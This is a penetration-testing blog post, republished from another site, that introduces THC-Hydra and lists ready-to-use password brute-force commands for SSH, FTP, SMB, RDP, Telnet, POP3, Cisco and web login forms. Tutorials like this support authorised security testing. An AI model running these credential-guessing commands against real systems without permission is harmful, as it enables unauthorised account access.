Using thc-hydra to brute force some commom service (FTP/SSH/SMB/POP3/Telnet/RDP/HTTP) – Penetration Testing

THC-Hydra is a very fast (multi-threaded) network logon cracker which supports many different services: afp, cisco, cisco-enable, cvs, firebird, ftp, http-get, http-head, http-proxy, https-get, https-head, httpsform-get, https-form-post, icq, imap, imap-ntlm, ldap2, ldap3, mssql, mysql, ncp, nntp, oracle-listener, pcanywhere, pcnfs, pop3, pop3-ntlm, postgres, rexec, rlogin, rsh, sapr3, sip, smb, smbnt, smtp-auth, smtp-authntlm, snmp, socks5, ssh2, svn, teamspeak, telnet, vmauthd, vnc.

USAGE

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

Using hydra to crack ssh
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

Using hydra to crack https:
# hydra -m /index.php -l username -P pass.txt IP https

Using hydra to crack teamspeak:
# hydra -l username -P wordlist -s portnumber -vV ip teamspeak

Using hydra to crack cisco:
# hydra -P pass.txt IP cisco
# hydra -m cloud -P pass.txt 192.168.1.11 cisco-enable

Using hydra to crack smb:
# hydra -l administrator -P pass.txt IP smb

Using hydra to crack pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3

Using hydra to crack rdp:
# hydra IP rdp -l administrator -P pass.txt -V

Using hydra to crack http-proxy:
# hydra -l admin -P pass.txt http-proxy://192.168.1.111

Using hydra to crack telnet
# hydra IP telnet -l username -P wordlist -t 32 -s 23 -e ns -f -V

Using hydra to crack ftp:
# hydra IP ftp -l username -P wordlist -t thread(default 16) -vV
# hydra IP ftp -l username -P wordlist -e ns -vV

GET REQUEST,crack web login:
# hydra -l username -p wordlist -t thread -vV -e ns IP http-get /admin/
# hydra -l username -p wordlist -t thread -vV -e ns -f IP http-get /admin/index.php

POST REQUEST,crack web login:
Example, web form

Command:
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:invalido”

The post Using thc-hydra to brute force some commom service (FTP/SSH/SMB/POP3/Telnet/RDP/HTTP) appeared first on Penetration Testing.

http://ift.tt/2tTtp58 http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s